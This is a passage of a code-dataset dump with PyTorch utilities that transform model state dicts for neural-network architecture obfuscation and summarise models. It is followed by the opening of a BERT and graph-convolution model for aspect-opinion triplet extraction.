torch.zeros_like(state_dict['{}.bias'.format(conv_name)])\n else:\n state_dict['{}_dp.bias'.format(conv_name)] = torch.zeros([state_dict['{}_dp.weight'.format(conv_name)].size()[1]])\n\n '''Modify skipcon_list (conv)'''\n if skipcon_list[j] == 1: 
#skip_connection\n orig_weight_shape = state_dict[\"{}.weight\".format(conv_name)].size()\n state_dict['{}_sk.weight'.format(conv_name)] = torch.zeros([orig_weight_shape[0], orig_weight_shape[0], orig_weight_shape[2], orig_weight_shape[3]])\n if if_bias:\n state_dict['{}_sk.bias'.format(conv_name)] = torch.zeros_like(state_dict['{}.bias'.format(conv_name)])\n else:\n state_dict['{}_sk.bias'.format(conv_name)] = torch.zeros([orig_weight_shape[0]])\n '''Modify decompo_list (conv)'''\n orig_weight = state_dict[\"{}.weight\".format(conv_name)]\n orig_shape = orig_weight.size()\n if if_bias:\n orig_bias = state_dict[\"{}.bias\".format(conv_name)]\n state_dict.pop(\"{}.weight\".format(conv_name), None)\n state_dict.pop(\"{}.bias\".format(conv_name), None)\n disable_decompo = next((True for line in buf if \"self.decompo_list[{}] = 0\".format(j) in line), False)\n if decompo_list[j] == 0 or decompo_list[j] > 4 or disable_decompo:\n state_dict[\"{}.weight\".format(conv_name)] = orig_weight\n if if_bias:\n state_dict[\"{}.bias\".format(conv_name)] = orig_bias\n elif decompo_list[j] == 1:\n result = next((True for line in buf if \"decompo_list[{}] == 1\".format(j) in line), False)\n if result:\n state_dict[\"{}_0.weight\".format(conv_name)] = orig_weight[:int(orig_shape[0]/2), :, :, :]\n state_dict[\"{}_1.weight\".format(conv_name)] = orig_weight[int(orig_shape[0]/2):, :, :, :]\n if if_bias:\n state_dict[\"{}_0.bias\".format(conv_name)] = orig_bias[:int(orig_shape[0]/2)]\n state_dict[\"{}_1.bias\".format(conv_name)] = orig_bias[int(orig_shape[0]/2):]\n else:\n state_dict[\"{}.weight\".format(conv_name)] = orig_weight\n if if_bias:\n state_dict[\"{}.bias\".format(conv_name)] = orig_bias\n elif decompo_list[j] == 2:\n result = next((True for line in buf if \"decompo_list[{}] == 2\".format(j) in line), False)\n if result:\n state_dict[\"{}_0.weight\".format(conv_name)] = orig_weight[:int(orig_shape[0]/4), :, :, :]\n state_dict[\"{}_1.weight\".format(conv_name)] = 
orig_weight[int(orig_shape[0]/4):int(orig_shape[0]/2), :, :, :]\n state_dict[\"{}_2.weight\".format(conv_name)] = orig_weight[int(orig_shape[0]/2):int(3*orig_shape[0]/4), :, :, :]\n state_dict[\"{}_3.weight\".format(conv_name)] = orig_weight[int(3*orig_shape[0]/4):, :, :, :]\n if if_bias:\n state_dict[\"{}_0.bias\".format(conv_name)] = orig_bias[:int(orig_shape[0]/4)]\n state_dict[\"{}_1.bias\".format(conv_name)] = orig_bias[int(orig_shape[0]/4):int(orig_shape[0]/2)]\n state_dict[\"{}_2.bias\".format(conv_name)] = orig_bias[int(orig_shape[0]/2):int(3*orig_shape[0]/4)]\n state_dict[\"{}_3.bias\".format(conv_name)] = orig_bias[int(3*orig_shape[0]/4):]\n else:\n state_dict[\"{}.weight\".format(conv_name)] = orig_weight\n if if_bias:\n state_dict[\"{}.bias\".format(conv_name)] = orig_bias\n elif decompo_list[j] == 3:\n result = next((True for line in buf if \"decompo_list[{}] == 3\".format(j) in line), False)\n if result:\n state_dict[\"{}_0.weight\".format(conv_name)] = orig_weight[:, :int(orig_shape[1]/2), :, :]\n state_dict[\"{}_1.weight\".format(conv_name)] = orig_weight[:, int(orig_shape[1]/2):, :, :]\n if if_bias:\n state_dict[\"{}_0.bias\".format(conv_name)] = orig_bias/2\n state_dict[\"{}_1.bias\".format(conv_name)] = orig_bias/2\n else:\n state_dict[\"{}.weight\".format(conv_name)] = orig_weight\n if if_bias:\n state_dict[\"{}.bias\".format(conv_name)] = orig_bias\n elif decompo_list[j] == 4:\n result = next((True for line in buf if \"decompo_list[{}] == 4\".format(j) in line), False)\n if result:\n state_dict[\"{}_0.weight\".format(conv_name)] = orig_weight[:, :int(orig_shape[1]/4), :, :]\n state_dict[\"{}_1.weight\".format(conv_name)] = orig_weight[:, int(orig_shape[1]/4):int(orig_shape[1]/2), :, :]\n state_dict[\"{}_2.weight\".format(conv_name)] = orig_weight[:, int(orig_shape[1]/2):int(3*orig_shape[1]/4), :, :]\n state_dict[\"{}_3.weight\".format(conv_name)] = orig_weight[:, int(3*orig_shape[1]/4):, :, :]\n if if_bias:\n 
state_dict[\"{}_0.bias\".format(conv_name)] = orig_bias/4\n state_dict[\"{}_1.bias\".format(conv_name)] = orig_bias/4\n state_dict[\"{}_2.bias\".format(conv_name)] = orig_bias/4\n state_dict[\"{}_3.bias\".format(conv_name)] = orig_bias/4\n else:\n state_dict[\"{}.weight\".format(conv_name)] = orig_weight\n if if_bias:\n state_dict[\"{}.bias\".format(conv_name)] = orig_bias\n\n\n elif \"fc\" in modify_list[i] or \"classifier\" in modify_list[i]:\n j += 1\n '''Modify widen_list (fc)'''\n if (widen_list[j] > 1) and (j < len(widen_list) - 1): #layer_widening, do not do to the last fc layer\n orig_weight = state_dict[\"{}.weight\".format(modify_list[i])]\n orig_shape = orig_weight.size()\n orig_bias = state_dict[\"{}.bias\".format(modify_list[i])]\n bn_name = \"fc_bn\" + modify_list[i].split(\"c\")[1]\n if (j < len(widen_list) - 2):\n next_fc_name = \"fc\" + str(int(modify_list[i].split(\"c\")[1]) + 1)\n else:\n next_fc_name = \"classifier\"\n orig_next_weight = state_dict['{}.weight'.format(next_fc_name)]\n\n extra_c = int(np.floor(orig_shape[0] *(widen_list[j] - np.floor(widen_list[j]))/4)*4) # get float part\n mul_factor = int(np.floor(widen_list[j])) # get int\n\n state_dict['{}.weight'.format(modify_list[i])] = torch.cat([orig_weight[:extra_c, :].repeat_interleave(mul_factor+1,0), orig_weight[extra_c:, :].repeat_interleave(mul_factor,0)], 0)\n state_dict['{}.bias'.format(modify_list[i])] = torch.cat([orig_bias[:extra_c].repeat_interleave(mul_factor+1,0), orig_bias[extra_c:].repeat_interleave(mul_factor,0)], 0)\n result = next((True for line in buf if bn_name in line), False)\n result2 = next((True for line in buf if (bn_name in line) and (\"affine=False\" in line)), False)\n if result:\n orig_bn_weight = state_dict['{}.weight'.format(bn_name)]\n orig_bn_bias = state_dict['{}.bias'.format(bn_name)]\n orig_bn_running_mean = state_dict['{}.running_mean'.format(bn_name)]\n orig_bn_running_var = state_dict['{}.running_var'.format(bn_name)]\n if not result2:\n 
state_dict['{}.weight'.format(bn_name)] = torch.cat([orig_bn_weight[:extra_c].repeat_interleave(mul_factor+1,0), orig_bn_weight[extra_c:].repeat_interleave(mul_factor,0)], 0)\n state_dict['{}.bias'.format(bn_name)] = torch.cat([orig_bn_bias[:extra_c].repeat_interleave(mul_factor+1,0), orig_bn_bias[extra_c:].repeat_interleave(mul_factor,0)], 0)\n state_dict['{}.running_mean'.format(bn_name)] = torch.cat([orig_bn_running_mean[:extra_c].repeat_interleave(mul_factor+1,0), orig_bn_running_mean[extra_c:].repeat_interleave(mul_factor,0)], 0)\n state_dict['{}.running_var'.format(bn_name)] = torch.cat([orig_bn_running_var[:extra_c].repeat_interleave(mul_factor+1,0), orig_bn_running_var[extra_c:].repeat_interleave(mul_factor,0)], 0)\n state_dict['{}.weight'.format(next_fc_name)] = torch.cat([orig_next_weight[:, :extra_c].repeat_interleave(mul_factor+1,1)/(mul_factor+1), orig_next_weight[:, extra_c:].repeat_interleave(mul_factor,1)/mul_factor], 1)\n\n\n '''Modify deepen_list (fc)'''\n if deepen_list[j] == 1: #layer_deepening\n state_dict['{}_dp.weight'.format(modify_list[i])] = torch.eye(state_dict['{}.weight'.format(modify_list[i])].size()[0])\n state_dict['{}_dp.bias'.format(modify_list[i])] = torch.zeros_like(state_dict['{}.bias'.format(modify_list[i])])\n\n '''Modify skipcon_list (fc)'''\n if skipcon_list[j] == 1: #skip_connection\n orig_weight_shape = state_dict[\"{}.weight\".format(modify_list[i])].size()\n state_dict['{}_sk.weight'.format(modify_list[i])] = torch.zeros([orig_weight_shape[0], orig_weight_shape[0]])\n state_dict['{}_sk.bias'.format(modify_list[i])] = torch.zeros_like(state_dict['{}.bias'.format(modify_list[i])])\n\n '''Modify decompo_list (fc)'''\n orig_weight = state_dict[\"{}.weight\".format(modify_list[i])]\n orig_shape = orig_weight.size()\n orig_bias = state_dict[\"{}.bias\".format(modify_list[i])]\n state_dict.pop(\"{}.weight\".format(modify_list[i]), None)\n state_dict.pop(\"{}.bias\".format(modify_list[i]), None)\n if decompo_list[j] == 1:\n 
result = next((True for line in buf if \"decompo_list[{}] == 1\".format(j) in line), False)\n if result:\n state_dict[\"{}_0.weight\".format(modify_list[i])] = orig_weight[:int(orig_shape[0]/2), :]\n state_dict[\"{}_0.bias\".format(modify_list[i])] = orig_bias[:int(orig_shape[0]/2)]\n state_dict[\"{}_1.weight\".format(modify_list[i])] = orig_weight[int(orig_shape[0]/2):, :]\n state_dict[\"{}_1.bias\".format(modify_list[i])] = orig_bias[int(orig_shape[0]/2):]\n else:\n state_dict[\"{}.weight\".format(modify_list[i])] = orig_weight\n state_dict[\"{}.bias\".format(modify_list[i])] = orig_bias\n elif decompo_list[j] == 2:\n result = next((True for line in buf if \"decompo_list[{}] == 2\".format(j) in line), False)\n if result:\n state_dict[\"{}_0.weight\".format(modify_list[i])] = orig_weight[:int(orig_shape[0]/4), :]\n state_dict[\"{}_0.bias\".format(modify_list[i])] = orig_bias[:int(orig_shape[0]/4)]\n state_dict[\"{}_1.weight\".format(modify_list[i])] = orig_weight[int(orig_shape[0]/4):int(orig_shape[0]/2), :]\n state_dict[\"{}_1.bias\".format(modify_list[i])] = orig_bias[int(orig_shape[0]/4):int(orig_shape[0]/2)]\n state_dict[\"{}_2.weight\".format(modify_list[i])] = orig_weight[int(orig_shape[0]/2):int(3*orig_shape[0]/4), :]\n state_dict[\"{}_2.bias\".format(modify_list[i])] = orig_bias[int(orig_shape[0]/2):int(3*orig_shape[0]/4)]\n state_dict[\"{}_3.weight\".format(modify_list[i])] = orig_weight[int(3*orig_shape[0]/4):, :]\n state_dict[\"{}_3.bias\".format(modify_list[i])] = orig_bias[int(3*orig_shape[0]/4):]\n else:\n state_dict[\"{}.weight\".format(modify_list[i])] = orig_weight\n state_dict[\"{}.bias\".format(modify_list[i])] = orig_bias\n elif decompo_list[j] == 3:\n result = next((True for line in buf if \"decompo_list[{}] == 3\".format(j) in line), False)\n if result:\n state_dict[\"{}_0.weight\".format(modify_list[i])] = orig_weight[: , :int(orig_shape[1]/2)]\n state_dict[\"{}_0.bias\".format(modify_list[i])] = orig_bias/2\n 
state_dict[\"{}_1.weight\".format(modify_list[i])] = orig_weight[: , int(orig_shape[1]/2):]\n state_dict[\"{}_1.bias\".format(modify_list[i])] = orig_bias/2\n else:\n state_dict[\"{}.weight\".format(modify_list[i])] = orig_weight\n state_dict[\"{}.bias\".format(modify_list[i])] = orig_bias\n elif decompo_list[j] == 4:\n result = next((True for line in buf if \"decompo_list[{}] == 4\".format(j) in line), False)\n if result:\n state_dict[\"{}_0.weight\".format(modify_list[i])] = orig_weight[: , :int(orig_shape[1]/4)]\n state_dict[\"{}_0.bias\".format(modify_list[i])] = orig_bias/4\n state_dict[\"{}_1.weight\".format(modify_list[i])] = orig_weight[: , int(orig_shape[1]/4):int(orig_shape[1]/2)]\n state_dict[\"{}_1.bias\".format(modify_list[i])] = orig_bias/4\n state_dict[\"{}_2.weight\".format(modify_list[i])] = orig_weight[: , int(orig_shape[1]/2):int(3 * orig_shape[1]/4)]\n state_dict[\"{}_2.bias\".format(modify_list[i])] = orig_bias/4\n state_dict[\"{}_3.weight\".format(modify_list[i])] = orig_weight[: , int(3 * orig_shape[1]/4):]\n state_dict[\"{}_3.bias\".format(modify_list[i])] = orig_bias/4\n else:\n state_dict[\"{}.weight\".format(modify_list[i])] = orig_weight\n state_dict[\"{}.bias\".format(modify_list[i])] = orig_bias\n else:\n state_dict[\"{}.weight\".format(modify_list[i])] = orig_weight\n state_dict[\"{}.bias\".format(modify_list[i])] = orig_bias\n return state_dict\n\n'''We are identifying a _obf model file to derive the search space. i.e. 
len(decompo_list)'''\ndef identify_model(model_log_file, forbid1x1 = False):\n num_conv = 0\n num_linear = 0\n modify_list = [\"reshape\"]\n kerneladd_list = []\n decompo_list = []\n with open(model_log_file, \"r\") as in_file:\n buf = in_file.readlines()\n for line in buf:\n if \"Conv2d\" in line:\n if forbid1x1:\n if \"(1x1)\" not in line:\n modify_list.append(\"conv{}\".format(num_conv))\n decompo_list.append(0)\n kerneladd_list.append(0)\n else:\n modify_list.append(\"conv{}\".format(num_conv))\n decompo_list.append(0)\n kerneladd_list.append(0)\n num_conv += 1\n elif \"Linear\" in line:\n if num_linear == 0:\n modify_list.append(\"reshape\")\n if \"[-1, 10]\" in line or \"[-1, 100]\" in line or \"[-1, 1000]\" in line:\n modify_list.append(\"classifier\")\n decompo_list.append(0)\n num_linear += 1\n else:\n modify_list.append(\"fc{}\".format(num_linear))\n decompo_list.append(0)\n num_linear += 1\n elif \"Pool\" in line:\n modify_list.append(\"maxpool\")\n elif \"LogSoftmax\" in line:\n modify_list.append(\"softmax\")\n return modify_list, decompo_list, kerneladd_list\n\n'''This funciton adds more entry to allow more fusable operation (after obfuscation, the number of fusion node increases accordingly, see misc/copy2tvm/tvm/src/transforms/fuse_ops.cc)'''\ndef get_extra_entries(decompo_list, dummy_list, deepen_list, skipcon_list):\n #other list could also bring more entries. 
number of entry decompo list could bring is been offseted by +3.\n result = sum(dummy_list)\n result += 4 * (sum(deepen_list) + sum(skipcon_list))\n for i in range(len(decompo_list)):\n if decompo_list[i] == 1:\n result += 4\n elif decompo_list[i] == 3:\n result += 10\n elif decompo_list[i] == 2:\n result += 6\n elif decompo_list[i] == 4:\n result += 17\n return result\n\n\ndef setup_logger(name, log_file, level=logging.INFO, console_out = False):\n \"\"\"To setup as many loggers as you want\"\"\"\n\n handler = logging.FileHandler(log_file, mode='w')\n handler.setFormatter(formatter)\n\n logger = logging.getLogger(name)\n logger.setLevel(level)\n logger.addHandler(handler)\n if console_out:\n stdout_handler = logging.StreamHandler(sys.stdout)\n logger.addHandler(stdout_handler)\n return logger\n\ndef summary(model, input_size, batch_size=-1, device=torch.device('cuda:0'), dtypes=None):\n result, params_info = summary_string(model, input_size, batch_size, device, dtypes)\n return result\n\ndef summary_string(model, input_size, batch_size=-1, device=torch.device('cuda:0'), dtypes=None):\n if dtypes == None:\n dtypes = [torch.FloatTensor]*len(input_size)\n\n summary_str = ''\n\n def register_hook(module):\n def hook(module, input, output):\n class_name = str(module.__class__).split(\".\")[-1].split(\"'\")[0]\n module_idx = len(summary)\n\n m_key = \"%s-%i\" % (class_name, module_idx + 1)\n summary[m_key] = OrderedDict()\n summary[m_key][\"input_shape\"] = list(input[0].size())\n summary[m_key][\"input_shape\"][0] = batch_size\n if isinstance(output, (list, tuple)):\n summary[m_key][\"output_shape\"] = [\n [-1] + list(o.size())[1:] for o in output\n ]\n else:\n summary[m_key][\"output_shape\"] = list(output.size())\n summary[m_key][\"output_shape\"][0] = batch_size\n\n params = 0\n if hasattr(module, \"weight\") and hasattr(module.weight, \"size\"):\n params += torch.prod(torch.LongTensor(list(module.weight.size())))\n summary[m_key][\"trainable\"] = 
module.weight.requires_grad\n summary[m_key][\"weight_shape\"] = list(module.weight.size())\n if hasattr(module, \"bias\") and hasattr(module.bias, \"size\"):\n params += torch.prod(torch.LongTensor(list(module.bias.size())))\n summary[m_key][\"nb_params\"] = params\n\n if (\n not isinstance(module, nn.Sequential)\n and not isinstance(module, nn.ModuleList)\n ):\n hooks.append(module.register_forward_hook(hook))\n\n # multiple inputs to the network\n if isinstance(input_size, tuple):\n input_size = [input_size]\n\n # batch_size of 2 for batchnorm\n x = [torch.rand(2, *in_size).type(dtype).to(device=device)\n for in_size, dtype in zip(input_size, dtypes)]\n\n # create properties\n summary = OrderedDict()\n hooks = []\n\n # register hook\n model.apply(register_hook)\n\n # make a forward pass\n # print(x.shape)\n model(*x)\n\n # remove these hooks\n for h in hooks:\n h.remove()\n\n summary_str += \"----------------------------------------------------------------\" + \"\\n\"\n line_new = \"{:>20} {:>25} {:>15}\".format(\n \"Layer (type)\", \"Output Shape\", \"Param #\")\n summary_str += line_new + \"\\n\"\n summary_str += \"================================================================\" + \"\\n\"\n total_params = 0\n total_output = 0\n trainable_params = 0\n for layer in summary:\n # input_shape, output_shape, trainable, nb_params\n # line_new = \"{:>20} {:>25} {:>15}\".format(\n # layer,\n # str(summary[layer][\"output_shape\"]),\n # \"{0:,}\".format(summary[layer][\"nb_params\"]),\n # )\n if \"weight_shape\" in summary[layer]:\n if len(summary[layer][\"weight_shape\"]) == 4:\n kernel_size = summary[layer][\"weight_shape\"][-1]\n else:\n kernel_size = \"x\"\n else:\n kernel_size = \"x\"\n\n line_new = \"{:>20} {:>25} {:>15}\".format(\n layer + \" ({}x{})\".format(kernel_size, kernel_size),\n str(summary[layer][\"output_shape\"]),\n \"{0:,}\".format(summary[layer][\"nb_params\"]),\n )\n total_params += summary[layer][\"nb_params\"]\n\n total_output += 
np.prod(summary[layer][\"output_shape\"])\n if \"trainable\" in summary[layer]:\n if summary[layer][\"trainable\"] == True:\n trainable_params += summary[layer][\"nb_params\"]\n summary_str += line_new + \"\\n\"\n\n # assume 4 bytes/number (float on cuda).\n total_input_size = abs(np.prod(sum(input_size, ()))\n * batch_size * 4. / (1024 ** 2.))\n total_output_size = abs(2. * total_output * 4. /\n (1024 ** 2.)) # x2 for gradients\n total_params_size = abs(total_params * 4. / (1024 ** 2.))\n total_size = total_params_size + total_output_size + total_input_size\n\n summary_str += \"================================================================\" + \"\\n\"\n summary_str += \"Total params: {0:,}\".format(total_params) + \"\\n\"\n summary_str += \"Trainable params: {0:,}\".format(trainable_params) + \"\\n\"\n summary_str += \"Non-trainable params: {0:,}\".format(total_params -\n trainable_params) + \"\\n\"\n summary_str += \"----------------------------------------------------------------\" + \"\\n\"\n summary_str += \"Input size (MB): %0.2f\" % total_input_size + \"\\n\"\n summary_str += \"Forward/backward pass size (MB): %0.2f\" % total_output_size + \"\\n\"\n summary_str += \"Params size (MB): %0.2f\" % total_params_size + \"\\n\"\n summary_str += \"Estimated Total Size (MB): %0.2f\" % total_size + \"\\n\"\n summary_str += \"----------------------------------------------------------------\" + \"\\n\"\n # return summary\n return summary_str, (total_params, trainable_params)","sub_path":"seq_obfuscator/torch_utils.py","file_name":"torch_utils.py","file_ext":"py","file_size_in_byte":27401,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"308785707","text":"# -*- coding: utf-8 -*-\n\nfrom layers.dynamic_rnn import DynamicLSTM\nimport torch\nimport torch.nn as nn\nimport pdb\nimport torch.nn.functional as F\nfrom transformers import AutoModel, AutoTokenizer\nfrom transformers import BertForTokenClassification\n# from 
transformers import BertModel, BertTokenizer\n\ndef generate_formal_adj(init_adj):\n '''input: a simple adj with a size of (row, column)\n output: a complete and formal adj with a size of (row+column, row+column)'''\n batch, row, column = init_adj.shape\n # up left matrix (batch, row, row)\n lu = torch.tensor(np.zeros((batch, row, row)).astype('float32')).cuda()\n # up right (batch, row, column)\n ru = init_adj.cuda()\n # down left (batch, column, row)\n ld = init_adj.transpose(1, 2).cuda()\n # down right (batch, column, column)\n rd = torch.tensor(np.zeros((batch, column, column)).astype('float32')).cuda()\n # up (batch, row, row+column)\n up = torch.cat([lu.float(), ru.float()], -1).cuda()\n # down (batch, column, row+column)\n down = torch.cat([ld.float(), rd.float()], -1).cuda()\n # final (batch, row+column, row+column)\n final = torch.cat([up,down],1).cuda()\n return final.cuda()\n\ndef preprocess_adj(A):\n '''\n for batch data\n Pre-process adjacency matrix\n :param A: adjacency matrix\n :return:\n '''\n # prepare\n assert A.shape[-1] == A.shape[-2]\n batch = A.shape[0]\n num = A.shape[-1]\n # generate eye\n I = torch.eye(num).unsqueeze(0).repeat(batch, 1, 1).cuda()\n # \n A_hat = A.cuda() + I\n #\n D_hat_diag = torch.sum(A_hat.cuda(), axis=-1)\n # \n D_hat_diag_inv_sqrt = torch.pow(D_hat_diag.cuda(), -0.5)\n # inf \n D_hat_diag_inv_sqrt = torch.where(torch.isinf(D_hat_diag_inv_sqrt.cuda()), torch.full_like(D_hat_diag_inv_sqrt.cuda(), 0), D_hat_diag_inv_sqrt.cuda())\n D_hat_diag_inv_sqrt = torch.where(torch.isnan(D_hat_diag_inv_sqrt.cuda()), torch.full_like(D_hat_diag_inv_sqrt.cuda(), 0), D_hat_diag_inv_sqrt.cuda())\n # \n tem_I = torch.eye(num).unsqueeze(0).repeat(batch, 1, 1).cuda()\n D_hat_diag_inv_sqrt_ = D_hat_diag_inv_sqrt.unsqueeze(-1).repeat(1,1,num).cuda()\n D_hat_inv_sqrt = D_hat_diag_inv_sqrt_ * tem_I\n # \n return torch.matmul(torch.matmul(D_hat_inv_sqrt.cuda(), A_hat.cuda()), D_hat_inv_sqrt.cuda())\n\nclass SequenceLabelForAO(nn.Module):\n def 
__init__(self, hidden_size, tag_size, dropout_rate):\n super(SequenceLabelForAO, self).__init__()\n self.tag_size = tag_size\n self.linear = nn.Linear(hidden_size, int(hidden_size / 2))\n self.hidden2tag_sub = nn.Linear(int(hidden_size / 2), self.tag_size)\n self.hidden2tag_obj = nn.Linear(int(hidden_size / 2), self.tag_size)\n self.dropout = nn.Dropout(dropout_rate)\n\n def forward(self, input_features):\n \"\"\"\n Args:\n input_features: (bs, seq_len, h)\n \"\"\"\n features_tmp = self.linear(input_features)\n features_tmp = nn.ReLU()(features_tmp)\n features_tmp = self.dropout(features_tmp)\n sub_output = self.hidden2tag_sub(features_tmp)\n obj_output = self.hidden2tag_obj(features_tmp)\n return sub_output, obj_output\n\nclass CustomizeSequenceLabelForAO(nn.Module):\n def __init__(self, hidden_size, tag_size, dropout_rate):\n super(CustomizeSequenceLabelForAO, self).__init__()\n self.tag_size = tag_size\n self.linear = nn.Linear(hidden_size, int(hidden_size / 2))\n self.hidden2tag_sub = nn.Linear(hidden_size, int(hidden_size / 2))\n self.hidden2tag_obj = nn.Linear(hidden_size, int(hidden_size / 2))\n self.linear_a = nn.Linear(hidden_size, self.tag_size)\n self.linear_o = nn.Linear(hidden_size, self.tag_size)\n self.dropout = nn.Dropout(dropout_rate)\n\n def forward(self, input_features):\n \"\"\"\n Args:\n input_features: (bs, seq_len, h)\n \"\"\"\n # share\n features_tmp = self.linear(input_features)\n features_tmp = nn.ReLU()(features_tmp)\n features_tmp = self.dropout(features_tmp)\n # ATE\n features_tmp_a = self.hidden2tag_sub(input_features)\n features_tmp_a = nn.ReLU()(features_tmp)\n features_tmp_a = self.dropout(features_tmp)\n # OTE\n features_tmp_o = self.hidden2tag_obj(input_features)\n features_tmp_o = nn.ReLU()(features_tmp)\n features_tmp_o = self.dropout(features_tmp)\n # cat \n features_for_a = torch.cat([features_tmp, features_tmp_a], -1)\n features_for_o = torch.cat([features_tmp, features_tmp_o], -1)\n # classifier\n sub_output = 
self.linear_a(features_for_a)\n obj_output = self.linear_a(features_for_o)\n\n return sub_output, obj_output\n\nclass SequenceLabelForAOS(nn.Module):\n def __init__(self, hidden_size, tag_size, dropout_rate):\n super(SequenceLabelForAOS, self).__init__()\n self.tag_size = tag_size\n self.linear = nn.Linear(hidden_size, int(hidden_size / 2))\n self.hidden2tag_sub = nn.Linear(int(hidden_size / 2), self.tag_size)\n self.hidden2tag_obj = nn.Linear(int(hidden_size / 2), self.tag_size)\n self.hidden2tag_senti = nn.Linear(int(hidden_size / 2), self.tag_size+1)\n self.dropout = nn.Dropout(dropout_rate)\n\n def forward(self, input_features):\n \"\"\"\n Args:\n input_features: (bs, seq_len, h)\n \"\"\"\n features_tmp = self.linear(input_features)\n features_tmp = nn.ReLU()(features_tmp)\n features_tmp = self.dropout(features_tmp)\n sub_output = self.hidden2tag_sub(features_tmp)\n obj_output = self.hidden2tag_obj(features_tmp)\n senti_output = self.hidden2tag_senti(features_tmp)\n return sub_output, obj_output, senti_output\n\nclass SequenceLabelForTriple(nn.Module):\n def __init__(self, hidden_size, tag_size, dropout_rate):\n super(SequenceLabelForTriple, self).__init__()\n self.tag_size = tag_size\n self.linear = nn.Linear(hidden_size, int(hidden_size / 2))\n self.hidden2tag_sub = nn.Linear(int(hidden_size / 2), self.tag_size)\n self.hidden2tag_obj = nn.Linear(int(hidden_size / 2), self.tag_size+1)\n self.dropout = nn.Dropout(dropout_rate)\n\n def forward(self, input_features):\n \"\"\"\n Args:\n input_features: (bs, seq_len, h)\n \"\"\"\n features_tmp = self.linear(input_features)\n features_tmp = nn.ReLU()(features_tmp)\n features_tmp = self.dropout(features_tmp)\n sub_output = self.hidden2tag_sub(features_tmp)\n obj_output = self.hidden2tag_obj(features_tmp)\n return sub_output, obj_output\n\nclass MultiNonLinearClassifier(nn.Module):\n def __init__(self, hidden_size, tag_size, dropout_rate):\n super(MultiNonLinearClassifier, self).__init__()\n self.tag_size = tag_size\n 
self.linear = nn.Linear(hidden_size, int(hidden_size / 2))\n self.hidden2tag = nn.Linear(int(hidden_size / 2), self.tag_size)\n self.dropout = nn.Dropout(dropout_rate)\n\n def forward(self, input_features):\n features_tmp = self.linear(input_features)\n features_tmp = nn.ReLU()(features_tmp)\n features_tmp = self.dropout(features_tmp)\n features_output = self.hidden2tag(features_tmp)\n return features_output\n\nclass GraphConvolution(nn.Module):\n \"\"\"\n Simple GCN layer, similar to https://arxiv.org/abs/1609.02907\n \"\"\"\n def __init__(self, in_features, out_features, bias=True):\n super(GraphConvolution, self).__init__()\n self.in_features = in_features\n self.out_features = out_features\n self.weight = nn.Parameter(torch.FloatTensor(in_features, out_features))\n if bias:\n self.bias = nn.Parameter(torch.FloatTensor(out_features))\n else:\n self.register_parameter('bias', None)\n\n def forward(self, text, adj):\n hidden = torch.matmul(text, self.weight)\n denom = torch.sum(adj, dim=2, keepdim=True) + 1\n # adj = torch.tensor(adj)\n adj = torch.tensor(adj, dtype=torch.float32)\n # hidden = torch.tensor(hidden)\n hidden = torch.tensor(hidden, dtype=torch.float32)\n output = torch.matmul(adj.cuda(), hidden.cuda()) / denom.cuda()\n # print(output.shape)\n # print(self.bias.shape)\n if self.bias is not None:\n return output + self.bias\n else:\n return output\n\nclass PairGeneration(nn.Module):\n \"\"\"\n Simple GCN layer, similar to https://arxiv.org/abs/1609.02907\n \"\"\"\n def __init__(self, features, bias=False):\n super(PairGeneration, self).__init__() # 32,13,300 32,300,13\n self.features = features\n # self.out_features = out_features\n self.weight = nn.Parameter(torch.FloatTensor(features, features))\n if bias:\n self.bias = nn.Parameter(torch.FloatTensor(features))\n else:\n self.register_parameter('bias', None)\n\n def forward(self, text):\n hidden = torch.matmul(text.float(), self.weight)\n # print(hidden.shape)\n # denom = torch.sum(adj, dim=2, 
keepdim=True) + 1\n # adj = torch.tensor(adj, dtype=torch.float32)\n hidden_ = torch.tensor(hidden, dtype=torch.float32)\n # print(hidden_.shape)\n output = torch.matmul(hidden_, hidden.permute(0,2,1))\n # print(output.shape)\n if self.bias is not None:\n return output + self.bias\n else:\n return output\n\nclass PairGeneration0(nn.Module):\n def __init__(self, features, bias=False):\n super(PairGeneration0, self).__init__() # 32,13,300 32,300,13\n self.features = features\n # self.out_features = out_features\n self.weight = nn.Parameter(torch.FloatTensor(features, features))\n if bias:\n self.bias = nn.Parameter(torch.FloatTensor(features))\n else:\n self.register_parameter('bias', None)\n\n def forward(self, text):\n hidden_1 = torch.unsqueeze(text,1).repeat(1,text.shape[1],1,1)\n hidden_2 = torch.unsqueeze(text,2).repeat(1,1,text.shape[1],1)\n output = torch.cat((hidden_1, hidden_2),-1)\n return output\n\nclass BERT_GCN(nn.Module):\n def __init__(self, opt, freeze_bert = False):\n super(BERT_GCN, self).__init__()\n pretrained_model = opt.bert_type\n # 'roberta-base', 'roberta-large', 'bert-base-uncased', 'bert-large-uncased'\n dim_dic = {'roberta-base': 768, 'roberta-large': 1024, 'bert-base-uncased': 768, 'bert-large-uncased':1024}\n self.dim = dim_dic[pretrained_model]\n self.opt = opt\n self.tokenizer = AutoTokenizer.from_pretrained(pretrained_model)\n self.bert_model = AutoModel.from_pretrained(pretrained_model)\n if freeze_bert:\n for param in self.bert_model.parameters():\n param.requires_grad = False\n\n self.text_embed_dropout = nn.Dropout(0.5)\n self.pairgeneration = PairGeneration0(self.dim)\n # new classifier \n self.aspect_opinion_classifier = SequenceLabelForAO(self.dim, 3, 0.5)\n self.triple_classifier = SequenceLabelForTriple(self.dim*2, 3, 0.5)\n\n self.aspect_classifier = nn.Linear(self.dim, 3)\n self.opinion_classifier = nn.Linear(self.dim, 3)\n self.pair_classifier = nn.Linear(self.dim*2, 3)\n self.pair_sentiment_classifier = 
nn.Linear(self.dim*2, 4)\n print('bert_gcn!!!')\n\n def forward(self, inputs, mask):\n # input\n text_indices, mask, aspect_labels, opinion_labels, pair_labels, triple_labels = inputs\n # prepare\n batch_size = text_indices.shape[0]\n sentence_len = text_indices.shape[1]\n # get sentence mask\n mask_ = torch.unsqueeze(mask, -1)\n # input sentnece s_0\n word_embeddings = self.bert_model(text_indices, mask)[0]\n text_out = self.text_embed_dropout(word_embeddings)\n # pair generation\n pair_text = self.pairgeneration(text_out)\n # AE and OE scores\n aspect_probs, opinion_probs = self.aspect_opinion_classifier(text_out.float())\n # aspect_probs, opinion_probs = self.aspect_classifier(text_out.float()), self.opinion_classifier(text_out.float())\n aspect_probs, opinion_probs = aspect_probs.contiguous().view(-1, 3), opinion_probs.contiguous().view(-1, 3)\n\n pair_probs_, pair_sentiment_probs_ = self.triple_classifier(pair_text.float())\n # pair_probs_, pair_sentiment_probs_ = 